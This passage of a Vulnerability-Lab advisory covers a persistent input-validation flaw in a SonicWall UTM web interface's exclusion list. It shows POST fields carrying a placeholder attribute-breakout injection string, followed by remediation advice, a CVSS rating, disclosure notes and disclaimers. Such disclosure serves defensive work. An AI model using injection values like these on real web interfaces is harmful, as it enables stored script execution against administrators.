viewConnRate%22%3A1%2C%22viewConnCount%22%3A1%2C%22viewCoreMonitor%22%3A1%2C%22displayBandwidth%22%3A%22bwSelRate%22%2C %22displayPktRate%22%3A%22pktRateSelRate%22%2C%22displayPktSize%22%3A%22pktSizeSelRate%22%2C%22displayConnRate%22%3A%22 connRateSelRate%22%2C%22displayConnCount%22%3A%22connCountSelCount%22%2C%22ipVerBandwidth%22%3A%222%22%2C %22ipVerApps%22%3A%222%22%2C%22showMostFrequentApps%22%3Afalse%2C%22inChartAppLegends%22%3Afalse%2C%22hideAppLegends%22%3Atrue%2C%22inChartBwLegends %22%3Afalse%2C%22hideBwLegends%22%3Atrue%2C%22hidePktRateLegends%22%3Atrue%2C %22hidePktSizeLegends%22%3Atrue%2C%22hideConnRateLegends%22%3Atrue%2C%22hideConnCountLegends%22%3Atrue%2C%22hideAppChart%22%3Afalse%2C%22hideBwChart %22%3Afalse%2C%22hidePktRateChart%22%3Afalse%2C%22hidePktSizeChart%22%3Afalse%2C %22hideConnRateChart%22%3Afalse%2C%22hideConnCountChart%22%3Afalse%2C%22hideCoreMonChart%22%3Afalse%2C%22hideMemoryMonChart%22%3Afalse%2C%22rtAppColors %22%3A%5B%22%23081D58%22%2C%22%23253494%22%2C%22%23225EA8%22%2C%22%231D91C0%22%2C %22%2341B6C4%22%2C%22%237FCDBB%22%2C%22%23C7E9B4%22%2C%22%23EDF8B1%22%2C%22%23FFFFD9%22%5D%2C%22rtDataColors %22%3A%5B%22%23E41A1C%22%2C%22%23377EB8%22%2C%22%234DAF4A%22%2C%22%23984EA3%22%2C%22%23FF7F00%22%2C%22%23FFFF33%22%2C %22%23A65628%22%2C%22%23F781BF%22%2C%22%23999999%22%2C%22%235A6B34%22%2C%22%23F0D64E%22%2C%22%23D7B740%22%2C%22%23AB80 24%22%2C%22%23925818%22%2C%22%23DB5A6E%22%2C%22%23071D69%22%2C%22%230A1650%22%2C%22%234571DA%22%2C%22%23E18B5C%22%2C %22%23028482%22%2C%22%237ABA7A%22%2C%22%23B76EB8%22%5D%2C%22useGradient%22%3Atrue%7D\] POST-Daten: csrfToken\[???\] inputbox\[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E\] list\[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E\] gav\_cloud\_exclude\_list\[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E\] gav\_cloud\_refresh\_exclusions\[\] refresh\_page\[gav\_cloud.html\] isobject\[1\] cgiaction\[%5Bobject+Window%5D\] Reference(s): https://utm\_waf.sonicwall.localhost:8351/main.cgi https://utm\_waf.sonicwall.localhost:8351/gavCloudExclusions.html https://utm\_waf.sonicwall.localhost:8351/addTrustedDomainDlg.html Solution - Fix & Patch: ======================= The vulnerability can be patched by setting up a secure validation for the update inputbox save procedure. Use the same as on the add procedure. Encode the context and disallow usage of special chars in the item list when processing to add. Parse the context and filter the input next to the permanent save that finally displays the context in the main item list to prevent an application-side script code execution. Note: The vulnerabilities has been reported to the dell security team. The issue has been resolved to 2016Q4 - 2017Q4 by the sonicwall developers. Security Risk: ============== The security risk of the application-side input validation web vulnerability and the filter bypass issue are estimated as medium (CVSS 4.5). Credits & Authors: ================== Benjamin K.M. \[bkm@vulnerability-lab.com\] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss\_upcoming.php - vulnerability-lab.com/rss/rss\_news.php Social: twitter.com/vuln\_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - \[Evolution Security GmbH\]™

Tag

#firefox